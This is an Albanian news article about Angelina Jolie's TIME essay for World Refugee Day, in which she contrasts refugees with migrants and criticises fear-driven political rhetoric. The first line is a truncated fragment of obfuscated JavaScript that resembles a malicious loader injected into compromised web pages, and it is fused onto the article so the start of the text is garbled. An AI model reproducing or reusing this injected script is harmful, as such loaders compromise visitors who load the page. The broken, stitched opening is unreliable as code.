;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Angelina Jolie shkruan një deklaratë që i prek edhe shqiptarët

By

Angelina Jolie ka shkruar një ese ku flet për krizën e refugjatëve.

44 vjeçarja ka shkruar një ese të titulluar “Çka ju detyrohemi refugjatëve?” për revistën TIME ku theksoi dallimin mes refugjatëve dhe imigrantëve.

“Pse fjala refugjat ka një konotacion negativ në kohët tona?” shkruan Angelina. “Pse po përzgjidhen politikanët pas premtimeve të tyre që të mbyllin kufijtë dhe të kthejnë mbrapa refugjatët?”

Angelina shkroi këtë ese që të shënjonte Ditën e Refugjatëve më 20 qershor.

“Sot, dallimi mes refugjatit dhe imigrantit është zbehur dhe politizuar,” shkruan Angelina. “Refugjatët janë të detyruar të lëshojnë vendin e tyre si shkak i përndjekjeve, luftës apo dhunës. Emigrantët zgjedhin të largohen nga vendi i tyre zakonisht që të përmisojnë jetën e tyre.”

Angelina pastaj vazhdon, “Disa liderë përdorin qëllimisht terminologjinë refugjat dhe emigrant në mënyrë të ndërsjellë, duke përdorur retorikën armiqësore që ndjellin frikën ndaj të gjithë të huajve.”

Ky është shkrimi i parë i aktores si editore për revistën TIME, ku ajo do shkruajë për tema si të drejtat e njeriut, zhvendosjen dhe konfliktin.

 

Burimi: Justjared.com

 

.

 

Artikuj të ngjashëm